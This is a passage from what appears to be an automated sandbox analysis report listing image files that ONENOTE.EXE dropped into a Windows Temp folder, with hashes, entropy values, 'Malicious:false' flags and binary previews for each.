                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):17289
                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                  C:\Users\user\AppData\Local\Temp\{B1803F15-D796-480E-9345-4A3CB6686841}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1604
                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                  C:\Users\user\AppData\Local\Temp\{B33F22E0-3F92-462A-95CA-7E764A7E2421}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):15740
                                                                                                  Entropy (8bit):6.0674556182683945
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:Elv3GG8/OOs+GouFdxMlxjoPyerzkpuOo2vPMc62PaJseZC+BJoS/:EtNiwdxMlZoPhzkpuOo2PMc6rX8+B6+
                                                                                                  MD5:FFA5EC40DC9A0FD10EB9E6355142D6A6
                                                                                                  SHA1:3D3D6A7E086B3C610C08F1F3E3F883604F06F2A4
                                                                                                  SHA-256:D74C3973C8D1F7C77274691AFB1AA934940674341D7EEE563BE75E563281BDFD
                                                                                                  SHA-512:6FAF2A24D06E6008F3579C7CEC90C2887462BDF83FAD7372FBB74B8DE90340B580E9836F309B68A9794597A598F7DCDA661C9A58DA6D8187C69083B7A17C9CD9
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!.1.....AQ..aq.g..8...."r....2.FG..#.E..7.Rb..Cc..D.v.B..3s..$d.%5Uu..&6fW'w........................!....1Aa...d..5e.6.q...Q..."2b.c..r3DE..BRs4U.#C.S.T............?...u.&0...cV.T.I...1..=4....Ce_.g.q.=F.M:>)...k..pm..h..=........S....)Ja8x...b.).=5.q..0......k.M.....1?-.G.b&.5..Ep.8t...'...R)..ta.F$bXO]tW.b.6#.t.XWN..ZW......].....G....x&&f..'L.....7...\...'.8...~`.sa...............................................X........qo...SMk...'.V...i..hb.}&?/.k.:>l.^....>Y...<}...&.jY.Gn.MKejyV......D......gf.0....t.nw..XQ...H.B.....=8.UkR.....Hm..w..]...k...#Z...F../.gjWvf.....w.aZ].2..5..^...VZv..._.7..a.|...:.B...,f...............~....m.;_.....-.e.y.w.[m.].bu.b.f+.E++\.....Y..7

                                                                                                  C:\Users\user\AppData\Local\Temp\{B87808EB-60A6-4417-8125-374F3ACDDDA3}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1657
                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                  C:\Users\user\AppData\Local\Temp\{B89A9B88-CBE9-4A8B-9328-F551319460C7}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):40035
                                                                                                  Entropy (8bit):7.360144465307449
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                  MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                  SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                  SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                  SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BC1FA520-422A-4D4D-9331-3B7B9E4A1558}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):109698
                                                                                                  Entropy (8bit):7.954100577911302
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                  MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                  SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                  SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                  SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BC27E805-FFA6-4BCE-9A17-F25BE1A42EC0}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):567
                                                                                                  Entropy (8bit):7.499095532051442
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:6v/7iQug6mbURgVowGtrjzeC/Gl2QL26YnQQNZTw61VeDp:PRgVqtrjSC/MJ26YQot3E
                                                                                                  MD5:D055CE625528E448C61315EAAEF5BB71
                                                                                                  SHA1:029DF4C872B1C154F32E7FE94F434547C3BA6192
                                                                                                  SHA-256:85BF1E672B4E86E9AF0C7874681EC9620DFDC78E0335B83EEF38C17D813B6705
                                                                                                  SHA-512:705B6B729E967FA946469571109AA892F5CB55A01C74D40AE02140D10CBF9B65DD5E511C06EBFE494E407742F8C6F4FBBE88664B78B37ABFB2F19DB1F66F4247
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR... ... .....szz.....sRGB.........pHYs..........o.d....IDATXG.V... ..7.^z....d},C...X.Zg.J..f..LA=1....9.9.....Oq.........Y..8.eYB.....y.-.....-..lh.ueM...:l..M.h..Z.d5..........e.Av....(..B...~..u.....Z6..x.[.p.x.{|..cb....J....j.O........{..[.DW..k..].m..%pD...<5..u...2....Y...F.B...............x.cb.....r.....c.HS..Dk....a.$v_a....2a....Up.....V.`.D+..B..t;FcBs..^......R.mT.).V;n.$.29..KM....Z..w.s'....@i@./..h..6..P.Z...a....2.....".z... @......P>..{.....3I.:P2..z{v&.B.....+.......G.>4.....}.#.m..9...|...a<!..d....IEND.B`.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BD8C0599-5A19-415E-8923-E50FB1D563BD}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):2210
                                                                                                  Entropy (8bit):7.86853667196985
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                  MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                  SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                  SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                  SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BE386717-B2DC-4380-B65D-E9FBD2323663}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):13084
                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                  C:\Users\user\AppData\Local\Temp\{BE481A6E-5BF9-4613-AF27-1C3A5EF64E14}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:18:09], progressive, precision 8, 164x641, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):27862
                                                                                                  Entropy (8bit):7.238903610770013
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:384:LTawAZvhbrXzDc6LERLQ/b5vXOl6pXQ/wD5OUMrdRUUhCplQg0ESSz:6wm/vT/b4wxoqbdUhWnSs
                                                                                                  MD5:E62F2908FA5F7189ED8EEBD413928DEE
                                                                                                  SHA1:CA249B4A70924B73BDA52972E9C735AEC35A0C5D
                                                                                                  SHA-256:20ABE389C885E42B6EBE9E902976229BB6FD63C8C34CB61AA70B8B746209F90A
                                                                                                  SHA-512:EE8D1821A918BE8714F431895E7223D08036E88A4FDB9A5485EFF246640EE969A69A8AA4E2E9DDC35BA75FB6D4E95092A286E90B477BD6998C313639C2C31F25
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:18:09......................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................!.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..P.v..+..n(a..Q..S\6....Y....D......} w#.b..]l.5.RU..k...... ]$.$.........f........?.z@2uU...7....?..|.Q..I.&.. ......"T4)wdH.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BEDABE1F-88CD-466E-B44D-680AF869E098}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):67991
                                                                                                  Entropy (8bit):7.870481231782746
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:3PC0XJjsmsKuZRG1pXuZ6z3wARnV9AEnieCc7cllJcHJ:qyMBzkUZ0gq25c7Z
                                                                                                  MD5:1271B1905D18A40D79A5B9DB27EE97EA
                                                                                                  SHA1:9618608FBD7342DE6C71220A36C3F4995BA9C13E
                                                                                                  SHA-256:5B321A4D81BD499B289B1755F6450A42047C494DFBC112DBD56DA4CED2C15C1A
                                                                                                  SHA-512:C32DD26047F6B8AA061085B38AC2B8335868E1BFD8731DB65544309223A955FA4BF45B06AC8D244408658F51A1775B6F19FF0FFC804989DE706DE8EB36F1436F
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1..AQa..q..".........2...BR#b.r.3...$.'...)..C%7gw..(.S.W89.......................!1.A.Qa.q".....2...#....B.t......rc.$%67Rb3s&'CUu.v....S.d5.V4T.e.............?...?..Wj.e.e.......w/..E..eOw_.....6......u..C6h.,..;.g.D8Z..-)O..jy..e;.u.g..w..[.L""k'w.......'1'.[......=..P...S.9a.V./O....q=8xk]...........9......F...e9'....9.O.... .&.....p......c.4...mr...?.......L..'.....0....+..|_...POM=7.?.2.a....};.Z..y./....>./.C.<...;.....|.1>...........S.8.o.O...+..n2...k../.X..9...Y...:.....\...Dk......q.K..\.Wuh.!Z?.mu...R.5.A.S.h.0..[..v..+M.....aUi*.k..?#..._...X..R.&]..[..;../]L..f..V......*.e...ut&.#.J.5....c%..o.$..v.<K.6..T.IP.....6X.*.uf..t0^..-.)m$.!.q(.j.f;..WB6.b.B..R.

                                                                                                  C:\Users\user\AppData\Local\Temp\{BF868DB0-31F4-404E-BF9D-D99939EAD319}

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):11197
                                                                                                  Entropy (8bit):7.975073010774664
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                  MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                  SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                  SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                  SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                  C:\Users\user\AppData\Local\Temp\{BF95B410-79B6-416E-9E73-9F291EAE25C6}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3679
                                                                                                  Entropy (8bit):7.931319059366604
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                  MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                  SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                  SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                  SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                  Malicious:false
                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                  C:\Users\user\AppData\Local\Temp\{BFD6D50B-949E-4399-AE1A-7B269005D011}.bin

                                                                                                  Download File
                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1924
                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                  Malicious:false
